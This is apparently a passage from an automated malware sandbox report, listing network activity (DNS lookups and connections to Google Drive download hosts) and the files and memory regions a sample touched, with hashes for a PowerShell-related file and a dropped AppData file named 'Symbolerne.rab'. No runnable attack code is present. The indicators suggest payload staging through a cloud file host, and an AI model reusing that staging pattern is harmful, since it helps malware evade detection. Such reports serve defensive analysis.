| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 105.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/2004-0-0x00007FFE57A63000-0x00007FFE57A65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1j4t5zg1.nd5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2004-10-0x000001A7DDB60000-0x000001A7DDB82000-memory.dmp
memory/2004-11-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/2004-12-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/2004-14-0x00007FFE57A63000-0x00007FFE57A65000-memory.dmp
memory/2004-15-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/2004-17-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/2004-20-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/5100-21-0x0000000002C60000-0x0000000002C96000-memory.dmp
memory/5100-22-0x00000000057C0000-0x0000000005DE8000-memory.dmp
memory/5100-23-0x00000000056B0000-0x00000000056D2000-memory.dmp
memory/5100-24-0x0000000005750000-0x00000000057B6000-memory.dmp
memory/5100-25-0x0000000005E60000-0x0000000005EC6000-memory.dmp
memory/5100-35-0x0000000005F50000-0x00000000062A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cb3bb854ff414cb031c64e184fd44781 |
| SHA1 | f53d30f0585d05a14f7dd82f2d0997ab44b02d62 |
| SHA256 | 42a5d533e9f3aa3407b26bd46789cd5b5f5eb580a51e64ced44c4e34c9c49896 |
| SHA512 | 9fdeb2a9b6fdd107e1ea87e646d295150fb0c8e1d1b32737cfb3fbfec9d2e595e237055676608e3474569e53b45e825b0ce28403de219cd36e48f7a3cb60e047 |
memory/5100-37-0x0000000006560000-0x000000000657E000-memory.dmp
memory/5100-38-0x00000000065B0000-0x00000000065FC000-memory.dmp
memory/5100-39-0x0000000007F00000-0x000000000857A000-memory.dmp
memory/5100-40-0x0000000006B00000-0x0000000006B1A000-memory.dmp
memory/5100-41-0x0000000007880000-0x0000000007916000-memory.dmp
memory/5100-42-0x0000000007780000-0x00000000077A2000-memory.dmp
memory/5100-43-0x0000000008580000-0x0000000008B24000-memory.dmp
C:\Users\Admin\AppData\Roaming\Symbolerne.rab
| MD5 | 4fa4bfe12534bd26a9e268a1e659e510 |
| SHA1 | f42014f4e7c0f11f4bb5f559c88310eb6db186a3 |
| SHA256 | 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0 |
| SHA512 | 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01 |
memory/5100-45-0x0000000008B30000-0x000000000DD19000-memory.dmp
memory/1676-58-0x0000000000800000-0x0000000001A54000-memory.dmp
memory/1676-59-0x0000000000800000-0x0000000001A54000-memory.dmp